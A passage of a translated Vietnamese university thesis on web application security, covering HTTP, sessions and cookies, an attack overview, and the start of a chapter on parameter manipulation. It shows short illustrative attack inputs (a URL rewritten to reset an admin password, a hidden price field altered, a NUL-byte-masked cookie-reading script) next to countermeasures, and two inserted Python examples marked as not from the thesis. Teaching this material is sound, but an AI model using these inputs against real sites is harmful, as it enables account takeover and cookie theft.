Bao Mat Ung Dung Web Tren Internet - Diendandaihoc - VN - 08040603062011


Faculty of Information Technology (Khoa CNTT)

MINISTRY OF EDUCATION AND TRAINING
UNIVERSITY OF NATURAL SCIENCES, HO CHI MINH CITY
FACULTY OF INFORMATION TECHNOLOGY
DEPARTMENT OF COMPUTER NETWORKS

GRADUATION THESIS
TOPIC:

A STUDY OF SOME WEB APPLICATION SECURITY ISSUES ON THE INTERNET

Supervisor: MSc. Mai Van Cuong
Students: Nguyen Duy Thang - 9912074, Nguyen Minh Thu - 9912156

CLASS OF 1999-2003

Acknowledgements

After nearly six months of effort, the thesis "Attack techniques and Web application security on the Internet" has been completed in some measure. Beyond our own best efforts, we received a great deal of encouragement from the university, our teachers, our families and our friends. First of all, we thank our parents for always encouraging us and giving us the best conditions to study and to complete this graduation thesis. We thank the teachers of the University of Natural Sciences for imparting valuable knowledge to us throughout our studies. In particular, we express our deep and sincere gratitude to Mr. Mai Van Cuong, who guided and helped us wholeheartedly while we worked on this thesis. Our thanks also go to all the friends who have encouraged and helped us during our studies and in completing this graduation thesis.

Comments

TABLE OF CONTENTS

INTRODUCTION ... 7
Organization of the thesis ... 9
PART ONE: THEORETICAL BACKGROUND ... 11
Chapter 1: Introduction to Web applications ... 12
  I. THE CONCEPT OF A WEB APPLICATION ... 13
  II. DESCRIPTION OF HOW A WEB APPLICATION OPERATES ... 16
Chapter 2: Related concepts and terms ... 18
  I. HACKER ... 19
  II. HTTP HEADER ... 19
  III. SESSION ... 21
  IV. COOKIE ... 22
  V. PROXY ... 25
Chapter 3: Overview of Web application attack techniques ... 26
  I. WEB ACCESS CONTROL ... 27
    I.1. Entering the system through a back door ... 27
  II. SESSION TAKEOVER ... 27
    II.1. Session fixation ... 27
    II.2. Session hijacking ... 27
  III. EXPLOITING SHORTCOMINGS IN INPUT DATA VALIDATION ... 27
    III.1. Validating data with a browser-side language ... 28
    III.2. Buffer overflow ... 28
    III.3. URL encoding ... 28
    III.4. Meta characters ... 28
    III.5. Path traversal ... 29
    III.6. Injecting code executed in the victim's browser ... 29
    III.7. Adding system commands ... 29
    III.8. Injecting SQL queries ... 30
    III.9. Server-side languages ... 30
    III.10. Null characters ... 30
    III.11. Parameter manipulation ... 30
  IV. INFORMATION LEAKAGE ... 31
  V. DENIAL OF SERVICE ... 31
PART TWO: WEB APPLICATION ATTACK TECHNIQUES AND SECURITY ... 33
Chapter 4: Parameter manipulation ... 34
  I. MANIPULATING THE URL ... 35
    I.1. Concept ... 35
    I.2. Some countermeasures ... 36
  II. MANIPULATING HIDDEN FORM FIELDS ... 36
    II.1. Concept ... 36
    II.2. Some countermeasures ... 38
  III. MANIPULATING COOKIES ... 39
    III.1. Concept ... 39
    III.2. Some countermeasures ... 40
  IV. MANIPULATING THE HTTP HEADER ... 41
    IV.1. Concept ... 41
    IV.2. Some countermeasures ... 42
Chapter 5: Injecting code executed in the victim's browser (Cross-Site Scripting) ... 43
  I. THE CROSS-SITE SCRIPTING (XSS) ATTACK TECHNIQUE ... 44
  II. THE TRADITIONAL XSS ATTACK METHOD ... 46
  III. SOME WEBSITES FOUND TO HAVE XSS HOLES ... 50
  IV. XSS ATTACKS USING FLASH ... 51
  V. COUNTERMEASURES ... 54
Chapter 6: Injecting SQL queries (SQL Injection) ... 56
  I. THE CONCEPT OF SQL INJECTION ... 57
  II. INTRODUCTION TO THE DATABASE MODEL ... 57
  III. ATTACK METHODS ... 58
    III.1. The SQL Injection attack technique ... 58
    III.2. Attacks based on the SELECT statement ... 60
    III.3. Attacks based on the HAVING clause ... 62
    III.4. Attacks based on the UNION operator ... 62
    III.5. Attacks based on the INSERT statement ... 69
    III.6. Attacks based on STORED PROCEDURES ... 70
    III.7. Advanced techniques ... 70
      III.7.1. Strings without single quotes ... 70
      III.7.2. Second-order attacks ... 71
      III.7.3. Evading controls ... 74
      III.7.4. Using Extended Stored Procedures ... 75
        III.7.4.1. Using the Extended Stored Procedures built into SQL Server ... 75
        III.7.4.2. Using self-made Extended Stored Procedures ... 76
        III.7.4.3. Importing a text file into a table ... 77
  IV. COUNTERMEASURES ... 77
    IV.1. Data validation ... 78
    IV.2. Locking down SQL Server (SQL Server Lockdown) ... 81
Chapter 7: Session takeover (Session Management) ... 83
  I. OVERVIEW OF SESSION IDS ... 84
  II. SESSION FIXATION ... 85
    II.1. Session ID attacks via URL parameters ... 88
    II.2. Session ID attacks via hidden form fields ... 89
    II.3. Session ID attacks via cookies ... 89
    II.4. Countermeasures ... 91
  III. SESSION HIJACKING ... 92
    III.1. Session ID prediction attacks ... 93
    III.2. Session ID brute-force attacks ... 93
    III.3. Stealing the session with injected code ... 94
    III.4. Countermeasures ... 94
    III.5. The difference between session hijacking and session fixation ... 94
Chapter 8: Buffer overflow ... 97
  I. CONCEPT ... 98
  II. MEMORY ORGANIZATION ... 99
    II.1. The stack ... 100
    II.2. Push and pop ... 101
    II.3. How a function call works ... 102
    II.4. Shell code ... 104
  III. SOME WAYS TO CAUSE A BUFFER OVERFLOW THROUGH A WEB APPLICATION ... 106
  IV. COUNTERMEASURES ... 106
Chapter 9: Denial of service (DoS) ... 108
  I. CONCEPT ... 109
  II. WAYS OF BEING ATTACKED BY DOS ... 109
  III. ATTACK TECHNIQUES ... 110
    III.1. The TCP three-way handshake ... 110
    III.2. Exploiting TCP for the traditional SYN flood ... 112
    III.3. Bandwidth attacks ... 113
      III.3.1. Attack type 1 ... 113
      III.3.2. Attack type 2 ... 113
    III.4. Attacks on system resources ... 117
  IV. COUNTERMEASURES ... 117
Chapter 10: Some other attack techniques ... 119
  I. URL ENCODING ... 120
    I.1. Concept ... 120
    I.2. Some countermeasures ... 121
  II. PATH TRAVERSAL ATTACKS ... 121
    II.1. Concept ... 121
    II.2. Some countermeasures ... 122
  III. NULL CHARACTER ATTACKS ... 123
    III.1. Concept ... 123
    III.2. Some countermeasures ... 123
  IV. SERVER-SIDE LANGUAGES ... 123
    IV.1. Concept ... 123
    IV.2. Attack method ... 125
    IV.3. Countermeasures ... 125
Chapter 11: Summary of a hacker's attack process ... 127
  I. GATHERING INFORMATION ABOUT THE TARGET'S INFRASTRUCTURE ... 128
  II. SURVEYING THE WEB APPLICATION ... 131
  III. ATTACKING ... 132
Chapter 12: Summary of countermeasures ... 134
  I. FOR NETWORK ADMINISTRATORS ... 135
  II. FOR WEB APPLICATION DESIGNERS ... 137
  III. FOR WEB APPLICATION USERS ... 139
PART THREE: THE WEB CHECKER PROGRAM ... 140
Chapter 13: The Web Checker program ... 141
  I. SPECIFICATION OF THE WEB CHECKER PROGRAM ... 142
    I.1. Overview ... 142
    I.2. Requirements ... 142
      I.2.1. Functional requirements ... 142
      I.2.2. Non-functional requirements ... 143
  II. ARCHITECTURE OF THE WEB CHECKER PROGRAM ... 143
    II.1. Architecture of the Web Checker program ... 143
    II.2. Communication between the program and the Web server ... 144
  III. IMPLEMENTATION ... 145
    III.1. Implementation language ... 145
    III.2. Implementation method ... 145
      III.2.1. Using the Dialog-style interface model ... 145
      III.2.2. Using an ActiveX Control (Microsoft Web Browser) ... 145
      III.2.3. Using the Window Socket 2 programming interface ... 146
      III.2.4. Main classes and functions implemented in the program ... 146
    III.3. Program description and usage ... 151
      III.3.1. Program screen ... 151
      III.3.2. Usage ... 152
  IV. EVALUATION OF THE PROGRAM ... 153
    IV.1. Achievements ... 153
    IV.2. Limitations ... 153
CONCLUSION ... 155
  I. ACHIEVEMENTS ... 156
  II. DIRECTIONS FOR FUTURE DEVELOPMENT ... 157
APPENDIX ... 158

INTRODUCTION

Today, as the Internet has become widespread, organizations and individuals alike need to present their information on the information highway and to carry out online transactions. The problem that arises is that as the scope of Web applications keeps expanding, the likelihood of flaws appearing and of being attacked also grows, and these applications become targets for many attackers with different motives. Sometimes the motive is simply to test one's skill or to show off to others. Along with the relentless growth of the Internet and its services, the number of attacks on the Internet has grown exponentially. While the mass media increasingly talk about the information-access possibilities of the Internet, the specialist literature has begun to address at length the question of security and data safety for computers connected to the Internet. According to figures from CERT (Computer Emergency Response Team), the number of Internet attacks reported to this organization was fewer than 200 in 1989, about 400 in 1991, 1400 in 1993, 2241 in 1994, and 5315 in 2001. These attacks were aimed at every kind of computer present on the Internet: the computers of all the large companies such as AT&T and IBM, of universities, government agencies, military organizations, banks... Some attacks were of enormous scale (up to 100,000 computers attacked). Moreover, these figures are only the tip of the iceberg. A very large proportion of attacks is never reported, for many reasons, among them the fear of losing reputation, or simply that system administrators are unaware of the attacks targeting their systems. A typical case is the attack on IBM's commercial software in March 2001, when two hackers found a flaw in the application that let anyone with a Web browser obtain user accounts, even the administrator's. Not only is the number of attacks rising rapidly, but attack methods are increasingly sophisticated and organized. Furthermore, administering network systems requires the administrator to have solid knowledge and experience of network systems, so weaknesses in administration create many opportunities for hackers to exploit. Also according to CERT, attacks in the 1988-1989 period mainly consisted of guessing user name/password pairs (UserID/password) or using flaws in programs and operating systems (security holes) to defeat the protection system; attacks in recent times, however, also include operations such as IP address spoofing, monitoring information transmitted over the network, hijacking remote sessions (telnet or rlogin), and installing trojans or worms to control or command computers... Therefore, the need to protect information on the Internet is essential, with the aim of protecting data, protecting users' information and protecting systems. When security is discussed, most security experts focus on the safety of the network system and of the operating system. To protect a system, the method usually chosen is a firewall. However, according to the CSI/FBI statement, 78% of the victim sites had a firewall in use and 59% were attacked via the Internet; more concretely, according to the CSI/FBI Computer Crime and Security Survey report, the total losses due to attacks on Web applications from 1997 to 2000 amounted to 626 million US dollars.

Although automated vulnerability-finding tools help Web programmers a great deal, they still cannot prevent everything, because Web technology is developing rapidly (with the emphasis mainly on aesthetics and speed), which gives rise to many new weaknesses. Attacks do not stay within the bounds of detection techniques; they are flexible and grow with the mistakes of system administrators as well as of application programmers. This thesis was carried out with the aim of studying and analyzing the security holes in Web applications (together with illustrative programs), and on that basis proposing remedies. In parallel, the thesis also implements a program for the "automatic detection of vulnerabilities in Web applications" to help Web programmers gain the experience to avoid mistakes when building applications.

Organization of the thesis

The thesis consists of 13 chapters divided into 3 parts:

Part one: THEORETICAL BACKGROUND. This part has 3 chapters:
+ Chapter 1: Introduction to Web applications
+ Chapter 2: Some related concepts and terms
+ Chapter 3: Overview of Web application attack techniques

Part two: ATTACK TECHNIQUES AND COUNTERMEASURES. This part has 9 chapters, from chapter 4 to chapter 12, of which the first 7 discuss attack techniques, each chapter ending with the countermeasures for that technique. Chapter 11 describes the hacker's attack process, and chapter 12 covers the most general countermeasures.

Part three: THE WEB CHECKER PROGRAM. This consists of the final chapter, which presents and explains the program.

The thesis ends with a conclusion that summarizes the issues presented and some directions for future development, and with the list of references.

PART ONE

THEORETICAL BACKGROUND

Chapter 1

INTRODUCTION TO WEB APPLICATIONS

Contents:
I. The concept of a Web application
II. Description of how a Web application operates

CHAPTER 1: INTRODUCTION TO WEB APPLICATIONS

This thesis was carried out to study attack techniques against Web sites and to propose countermeasures. Therefore, in this first chapter the thesis briefly introduces some basic concepts, which are the foundation on which the content of the later parts is built.

I. THE CONCEPT OF A WEB APPLICATION

A Web application is a client/server application that uses the HTTP protocol to interact with users or with other systems. The client used by a person is usually a Web browser such as Internet Explorer or Netscape Navigator. It may also be a program acting as a user agent, which works like an automated browser. Users send information to and receive information from the server by acting on Web pages. Such programs may be trading sites, forums, e-mail services... The pace at which techniques for building Web applications develop is also very fast. Formerly, Web applications were usually built with CGI (Common Gateway Interface), ran on Web servers and could connect to simple databases on the same server. Today, Web applications are usually written in Java (or similar languages), run on distributed servers and connect to many data sources. A Web application typically has an architecture consisting of:

Figure 1.I-1. Architecture of a Web application

Presentation layer: this layer is responsible for displaying data to the user; it may also contain additional applications that create the layout of the Web page.

Application layer: this is where the processing of the Web application happens. It processes the information the user requests, makes decisions, and sends the results to the presentation layer. This layer is usually implemented with programming technologies such as CGI, Java, .NET, PHP or ColdFusion, deployed on servers such as IBM WebSphere, WebLogic, Apache, IIS...

Data layer: usually database management systems (DBMS), responsible for managing the data files and access rights.

Modelling the operation of a Web application:

Figure 1.I-2. Operating model of a Web application

Where:
Client (also called the browser): Internet Explorer, Netscape Navigator...
Server: Apache, IIS, ...
Database management system: SQL Server, MySQL, DB2, Access.

In addition, a commonly used solution for protecting a network system is the firewall. It acts as an outer barrier around a network system, and its main function is to control the flow of information between computers. A firewall can be viewed as an information filter: it decides and permits whether one computer may access another, or whether one network may access another. Firewalls are usually used for the following purposes:
Allowing or denying services that access the outside.

Allowing or denying services from outside that access the inside.
Controlling access addresses and blocking access addresses.
A firewall operates on IP packets and therefore controls access by the user's machine.

II. DESCRIPTION OF HOW A WEB APPLICATION OPERATES

First, the browser sends a request to the Web server using the basic GET and POST commands of the HTTP protocol. The server may then execute a program written in a language such as Perl or C/C++, or ask an interpreter to execute ASP or JSP pages as the client requested. Depending on the tasks of the installed program, it processes, computes, connects to the database, stores the information the client sent, and so on, and then returns to the client a data stream formatted according to the HTTP protocol, consisting of 2 parts:

Header: describes information about the data package and the attributes and exchange state between the browser and the Web server.

Body: the content the server sends back to the client; it may be an HTML file, an image, a video clip or any document.

In the model of figure 1.I-2, to the firewall the information flow between server and client is a legitimate flow. Thus, if a hacker finds a hole in the Web application, the firewall is of no use in stopping that hacker. Consequently, attack techniques against network systems today increasingly focus on the mistakes (or holes) that Web developers leave in the application-building process rather than on attacking the network system or the operating system directly. However, hackers can also exploit Web holes to extend their attack to other, unrelated systems.

Chapter 2

RELATED CONCEPTS AND TERMS

Contents:
I. Hacker
II. HTTP Header
III. Session
IV. Cookie
V. Proxy

CHAPTER 2: RELATED CONCEPTS AND TERMS

I. HACKER

Hacker is a term used to refer to those who sabotage network systems. Hackers are usually computer experts. Hackers do not create the holes in a system, but they are people who understand operating systems, database management systems, programming languages... They use their knowledge to search for and exploit the holes in network systems. Some hackers stop at discovering the flaws they find and reporting them to security people or program developers; they are regarded as WhiteHat hackers. Other hackers rely on the holes to carry out unauthorized exploitation for sabotage or for personal gain; these are regarded as BlackHat hackers. Because of the prevalence of the term hacker, in this presentation the thesis uses "hacker" in place of "attacker".

II. HTTP HEADER

The HTTP header is the leading part (header) of the information that the client and the server send to each other. The information the client sends to the server is called the HTTP request, and the information the server sends to the client is the HTTP response. Usually an HTTP header consists of many lines, each containing a parameter name and its value. Some parameters may be used in both request and response headers, while others are used only in one of the two. Example:

Request header:

    GET /tintuc/homnay.asp HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Connection: Keep-Alive
    Host: localhost
    Referer: http://localhost/lienket.asp
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
    Accept-Encoding: gzip, deflate

The first line is the request line; it gives the request method (GET or POST), the requested address (/tintuc/homnay.asp) and the HTTP version (HTTP/1.1).

o Next come the parameters, for example:
  Accept-Language: indicates the language used in the Web page.
  Host: indicates the address of the server.
  Referer: indicates the address of the referring Web page.
o The header of the HTTP request ends with a blank line.

Response header:

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Thu, 13 Jul 2000 05:46:53 GMT
    Content-Length: 2291
    Content-Type: text/html
    Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/
    Cache-control: private

    <HTML>
    <BODY>
    ...

o The first line is the status line; it gives the HTTP version in use (HTTP/1.1), the status code (200) and the status text (OK).
o Next come the parameters.
o Then a blank line signals the end of the header, followed by the body of the HTTP response.

The list of HTTP header parameters is given in appendix A.

III. SESSION

HTTP is a general-purpose, object-oriented, stateless protocol, which means that HTTP does not keep the working state between the browser and the server. This shortcoming causes difficulties for some Web applications, because the server cannot know in advance what states the browser has been in. To solve this problem, Web applications introduce the concept of a working session (Session), and the SessionID is a string that authenticates the session. Some servers provide a SessionID to users when they view Web pages on the server. To maintain the session, the SessionID is usually stored in:

A URL variable
A hidden form field
A cookie

A session exists only for a permitted period of time, which is configured on the server or by the running application. The server automatically releases the session in order to reclaim system resources.

IV. COOKIE

Cookies are small, structured pieces of data shared between the server and the user's browser. Cookies are stored as small text-format data files, created by the application to store, retrieve and recognize information about the users who visit a Web site and the areas they pass through on the site. This information may include the user's name or identifier, password, preferences, habits... The cookie is accepted by the user's browser and stored on the user's hard disk; however, browsers do not always support cookies, and it also depends on whether the user agrees to store them. On later visits to that Web site, the application can reuse the information in the cookie (for example the login information for Yahoo! Messenger) so the user does not have to log in again or provide the other information again. Cookies are classified in 2 ways, secure/non-secure and persistent/non-persistent, so there are 4 kinds of cookie:

Persistent and Secure
Persistent and Non-Secure
Non-Persistent and Secure
Non-Persistent and Non-Secure

Persistent cookies are stored as .txt files on the client machine for a specified period of time (for example, Netscape Navigator stores its cookies in a single file cookie.txt, while Internet Explorer stores them as several *.txt files, each file holding one cookie). Non-persistent cookies are kept in the client's RAM and are destroyed when the Web page is closed or when a delete command is received from the Web page. Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over both HTTPS and HTTP. In essence, for a secure cookie the server provides a secure transmission mode. The components of a cookie are:
    Domain:     www.redhat.com
    Flag:       FALSE
    Path:       /
    Secure:     FALSE
    Expiration: 1154029490
    Name:       Apache
    Value:      64.3.40.151.16018996349247480

Domain: the domain name of the Web site that created the cookie (in the example above, www.redhat.com).

Flag: takes the value TRUE/FALSE. Determines whether other machines with the same domain name can access the cookie.

Path: the scope of addresses that can access the cookie. For example, if the path is /tracuu, then the addresses in the /tracuu directory and all of its subdirectories, such as /tracuu/baomat, can access this cookie. If the value is /, the cookie can be accessed by every address in the domain of the Web site that created it.

Secure: takes the value TRUE/FALSE. Determines whether this is a secure cookie, that is, whether the connection uses SSL.

Expiration: the expiry time of the cookie, counted in seconds from 00:00:00 GMT on 01/01/1970. If this value is not set, the browser treats the cookie as non-persistent, keeps it only in RAM and deletes it when the browser is closed.

Name: the variable name (in this case Apache).

Value: for the cookie created above, the value of Apache is 64.3.40.151.16018996349247480 and the expiry date is 27/07/2006, for the domain http://www.redhat.com.

For example, the following command string in an HTTP header creates a cookie:

    Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/"; domain="www.redhat.com"; path_spec; expires="2006-07-27 19:39:15Z"; version=0

Netscape (NS) cookies are kept in a single file Cookies.txt, at the path: C:\Program Files\Netscape\Users\UserName\Cookies.txt

IE cookies are stored as several files, each file being one cookie, placed in [C:]\Documents and Settings\[username]\Cookies (Win2000); on Win9x the cookies folder is inside the [C:]\Windows\cookies folder. The maximum size of a cookie is 4kb. The maximum number of cookies per domain is 20. A cookie that is deleted as soon as the browser closes is called a session cookie.
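The seven components listed above are exactly the seven tab-separated fields of a line in the Netscape cookies.txt file mentioned in the text. The following is an added example, not code from the thesis: a parser for such lines that classifies each cookie into one of the four kinds named above and applies the path-scope rule. The sample lines are constructed here (the first one carries the redhat.com values from the text); the function names are this example's own.

```python
"""Parse Netscape-format cookies.txt lines (added example, not from the thesis)."""
from datetime import datetime, timezone

# Field order of a Netscape cookies.txt line, as tabulated in the text.
FIELDS = ("domain", "flag", "path", "secure", "expiration", "name", "value")

# Constructed sample lines. The first reproduces the cookie from the text; the
# second is a made-up session cookie scoped to /tracuu and marked secure.
SAMPLE_PERSISTENT = "www.redhat.com\tFALSE\t/\tFALSE\t1154029490\tApache\t64.3.40.151.16018996349247480"
SAMPLE_SESSION = "www.example.test\tFALSE\t/tracuu\tTRUE\t\tsid\tabc123"


def parse_cookie_line(line):
    """Turn one tab-separated line into a dict with typed flag/secure/expiration."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d tab-separated fields, got %d" % (len(FIELDS), len(parts)))
    cookie = dict(zip(FIELDS, parts))
    cookie["flag"] = cookie["flag"].upper() == "TRUE"
    cookie["secure"] = cookie["secure"].upper() == "TRUE"
    # An empty (or zero) expiration means the browser keeps the cookie only in RAM.
    exp = cookie["expiration"].strip()
    cookie["expiration"] = int(exp) if exp else 0
    return cookie


def classify(cookie):
    """One of the four kinds listed in the text, e.g. 'Persistent and Non-Secure'."""
    persistence = "Persistent" if cookie["expiration"] > 0 else "Non-Persistent"
    secure = "Secure" if cookie["secure"] else "Non-Secure"
    return persistence + " and " + secure


def expiry_date(cookie):
    """Expiration as a UTC calendar date string, or None for a session cookie."""
    if cookie["expiration"] <= 0:
        return None
    return datetime.fromtimestamp(cookie["expiration"], timezone.utc).strftime("%Y-%m-%d")


def path_matches(cookie, request_path):
    """Path-scope rule from the text: the cookie's path and all its subdirectories."""
    cpath = cookie["path"]
    if cpath == "/":
        return True
    return request_path == cpath or request_path.startswith(cpath.rstrip("/") + "/")


if __name__ == "__main__":
    for line in (SAMPLE_PERSISTENT, SAMPLE_SESSION):
        c = parse_cookie_line(line)
        print(c["name"], classify(c), expiry_date(c), path_matches(c, "/tracuu/baomat"))
```

Reading the file this way also makes the security property visible: a persistent cookie carrying a session identifier stays on disk until its expiration, readable by anyone with access to the file, whereas a session cookie disappears with the browser process.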

V. PROXY

A proxy gives users Internet access for particular protocols, or for a set of protocols, executed on a dual-homed host or a bastion host. The user's client programs go through the intermediary proxy server in place of the real server the user wants to communicate with. The proxy server examines the requests from the client and decides whether or not to serve them; if a request is accepted, the proxy server connects to the real server on behalf of the client and continues to forward the client's requests to the server and the server's replies to the client. The proxy server is therefore an intermediate bridge between server and client.

Chapter 3

OVERVIEW OF WEB APPLICATION ATTACK TECHNIQUES

Contents:
I. Web access control
II. Session takeover
III. Exploiting shortcomings in input data validation
IV. Information leakage
V. Denial of service

CHAPTER 3: OVERVIEW OF WEB APPLICATION ATTACK TECHNIQUES

The following are brief descriptions of Web application attack techniques, classified by the degree of harm they cause to the application.

I. WEB ACCESS CONTROL

I.1. Entering the system through a back door

During application design, the application developers may install a back door so that they can later enter the system easily.

II. SESSION TAKEOVER (Session Management)

II.1. Session fixation

An attack technique that lets a hacker impersonate a legitimate user by sending a valid session ID to the user; once the user has logged in to the system successfully, the hacker uses that session ID and thereby becomes the legitimate user.

II.2. Session hijacking

An attack technique that lets a hacker impersonate a legitimate user after the victim has logged in to the system, by decoding the victim's session ID stored in a cookie, a URL parameter or a hidden form field.

III. EXPLOITING SHORTCOMINGS IN INPUT DATA VALIDATION (Input validation)

The hacker exploits input fields to send an arbitrary piece of code that makes the system execute that code or break down completely.

III.1. Validating data with a browser-side language (Client-side validation)

Because browser-side languages (JavaScript, VBScript...) are executed in the browser, the hacker can modify the source code and so disable the validation.

III.2. Buffer overflow

A quantity of data sent to the application exceeds the amount allocated, so the application cannot execute its intended next instruction and instead executes arbitrary code the hacker has injected into the system. This is more serious if the application is configured to run with root privileges on the system.

III.3. URL encoding

Exploiting the encoding standard for special characters in URLs, the hacker encodes the illegal characters (those checked for by the scripting language) in order to get past that control.

III.4. Meta characters

Using special characters (explained in more detail in the appendix), the hacker can insert into the sent data characters that belong to command strings, such as <script> in the XSS technique or -- in SQL, in order to execute commands.

III.5. Path traversal

A method that exploits the path used to access a file in the URL, whose result is returned to the browser, so that the hacker can obtain the contents of any file on the system.

III.6. Injecting code executed in the victim's browser (Cross-Site Scripting)

This attack technique mainly targets the information on the user's computer rather than the server system. By adding arbitrary code (usually written in a scripting language such as JavaScript or VBScript), the hacker can steal important information such as cookies and, based on the stolen information, become a legitimate user of the application. Cross-Site Scripting is also a kind of session hijacking attack.

III.7. Adding system commands (OS Command Injection)

The ability to execute system commands or code added to parameters that are not strictly checked, such as form parameters, cookies, HTTP request headers, and dangerous data in files uploaded to the server. Success with this technique lets the hacker execute system commands with the same privileges as the server.

III.8. Injecting SQL queries (SQL Injection)

In database programming, the programmer's carelessness in checking the input values lets the hacker add queries or invalid values in order to log in to the system easily.

III.9. Server-side languages (Server side includes)

The ability to insert system commands such as file inclusion (include file) or database access (jdbc)..., which gives the hacker the opportunity to reach files and databases that normally cannot be viewed on the Web site.

III.10. Null characters

Exploiting the fact that strings usually end with \0, the hacker often adds it to fool the application: with applications that use a CGI program written in C++, the C++ code takes \0 as the end of the string. Example: the hacker enters the following string:

    ti th nht\0<script> alert(document.cookie)</script>

If the application uses a C++ program to check the validity of the string, the string above passes as valid, because C++ recognizes \0 as the end of the string and therefore does not check the part after it.
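The null-character problem above is a mismatch between two views of the same input: the C string functions see only the bytes up to the first \0, while the rest of the pipeline (the HTML page, the browser) sees every byte. The following is an added example, not code from the thesis: it emulates the truncated C-string view beside a check that validates the full buffer and rejects embedded NUL bytes outright. The inputs are constructed here (the second one mirrors the text's example) and the function names are this example's own.

```python
"""NUL-byte truncation in input validation (added example, not from the thesis)."""
import re

# Constructed inputs. The second hides a script tag behind a NUL byte, as in the text.
CLEAN_INPUT = b"ti th nht"
HIDDEN_INPUT = b"ti th nht\x00<script> alert(document.cookie)</script>"

# Characters the validator refuses to pass through to an HTML page.
FORBIDDEN = re.compile(rb"[<>]")


def c_string_view(data):
    """What strlen()-based C/C++ code sees: the bytes before the first NUL."""
    return data.split(b"\x00", 1)[0]


def validate_truncating(data):
    """The flawed check from the text: only the C-visible prefix is inspected."""
    return FORBIDDEN.search(c_string_view(data)) is None


def validate_strict(data):
    """Correct check: an embedded NUL is itself invalid, and the whole buffer is scanned."""
    if b"\x00" in data:
        return False
    return FORBIDDEN.search(data) is None


def what_the_browser_sees(data):
    """The downstream consumer keeps the full length, so the hidden part is rendered."""
    return data.decode("latin-1").replace("\x00", "")


if __name__ == "__main__":
    for sample in (CLEAN_INPUT, HIDDEN_INPUT):
        print(repr(sample), validate_truncating(sample), validate_strict(sample))
```

The practical rule this illustrates: a validator must operate on the same length-delimited buffer that the rest of the application uses, and any input that contains \0 should be rejected rather than trusted up to the byte where C stops reading.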

III.11. Parameter manipulation

The information exchanged between the server and the browser is stored in variables such as URL variables, hidden form fields, cookies... Because the control of these variables has not been given adequate attention, the hacker can exploit them by modifying a variable's value in order to steal a user's session or change the price of an item.

IV. INFORMATION LEAKAGE (Informational)

Files and applications on the system that contain important information, such as the source code of a Web page or a file containing the passwords of the system's users, are always targets for the hacker. Comments in source code are also a useful source of information for the hacker. The hacker uses the HTTP response from the system to determine whether a file or application exists. Example 1.IV-1: HTTP 200: the file exists; HTTP 404: the file does not exist.

V. DENIAL OF SERVICE (Denial of service, DoS)

A large number of requests is sent to the application within a given period of time, so the system cannot respond in time and breaks down.

Because the scope and time of the thesis are limited, it only studies some common techniques with a high potential for damaging a network system. In the chapters of part two, the thesis presents each of the following techniques in more detail:

Parameter manipulation
Injecting code executed in the browser
Injecting SQL queries
Session takeover

Buffer overflow
Denial of service
Some other techniques:
  o Null characters
  o URL encoding
  o Exploiting the path used to access a file
  o Server-side languages

PART TWO

WEB APPLICATION ATTACK TECHNIQUES AND SECURITY

Chapter 4

PARAMETER MANIPULATION

Contents:
I. Manipulating the URL
II. Manipulating hidden form fields
III. Manipulating cookies
IV. Manipulating the HTTP Header

CHAPTER 4: PARAMETER MANIPULATION

Parameter manipulation is the technique of changing important information in cookies, URLs or hidden form fields. The techniques Cross-Site Scripting, SessionID, SQL Injection, Buffer Overflow... also need these parameters to complete the hacker's attack steps. It can be said that the passed parameters are the starting point for everything the hacker does while attacking an application. That is why this is the subject of the first chapter in part two, and its purpose is also to support the presentation in the following chapters.

I. MANIPULATING THE URL

I.1. Concept

When an HTML form is submitted, the result is sent in one of two ways: GET or POST. With GET, all the variable names and their values appear in the URL string. Example 4.I.1-1: a Web application page lets members change their password:

    http://www.nganhang.com/example?user=thang&newpass=123

Where:
+ username is the name of the user whose password is to be changed.
+ newpass is the new password for username.

However, by changing the parameters as follows:

    http://www.nganhang.com/example?user=admin&newpass=111111

the hacker can change the admin's password to any new password, in this example 111111.

I.2. Some countermeasures

To counter this kind of modification of the URL string, the application can apply the following measure: the application uses a hash table mechanism. After a user authenticates successfully with a username, the application generates a corresponding key. This key is stored on the server together with the username variable in a hash table object. Each time the user connects to the application, this key and the username are sent along and compared with the key and username in the hash table. If they match the stored record, the request is valid; if not, the server knows that the user has modified the URL. In addition, valuable information should be encrypted before it is displayed in the browser, so that the hacker cannot modify it at will.

II. MANIPULATING HIDDEN FORM FIELDS

II.1. Concept

Information may be passed through a hidden form field (Hidden Form Field). A hidden form field is not shown on the browser screen, but the user can find its content in "view source"; this is therefore a weakness that the hacker exploits by saving the Web page from the browser, changing the page's content and sending it to the server.

Example 4.II.1-1: the original form has the following content:

    <form action="http://www.tancong.com/cuahang.pl" method="POST">
    ...
    <input type="hidden" name="giaca" value="99.99">
    ...
    </form>

If nothing is changed, the request sent to the server has the content:

    POST /cuahang.pl HTTP/1.0
    ...
    giaca=99.99

But if the hacker assigns a different value to the giaca field:

    <form action="http://www.tancong.com/cuahang.pl" method="POST">
    ...
    <input type="hidden" name="giaca" value="0.99">
    ...
    </form>

then the request changes to:

    POST /cuahang.pl HTTP/1.0
    ...
    giaca=0.99

Besides changing the content of hidden form fields, the hacker can also alter the other components of the form, such as the length of an input field, in order to carry out a BUFFER OVERFLOW attack.

II.2. Some countermeasures

Hidden form fields should only be used to display data in the browser; the value of the field should not be used in the application's processing.

Use the HTTP_REFERER variable to check the origin of the incoming request; however, the hacker can use a proxy to hide the real origin, so HTTP_REFERER should not be relied on too much for this check.

Concatenate the names and values of the hidden fields into a single string. Use the MD5 hashing algorithm, or another one-way hash, to digest the string, and store the digest in a hidden field called the "pattern string". When the form values are submitted, the same operations are repeated with the same key that we defined beforehand, and the result is compared with the pattern string; if they do not match, the values in the form have been changed.

Use a sessionID that references information stored in the database.
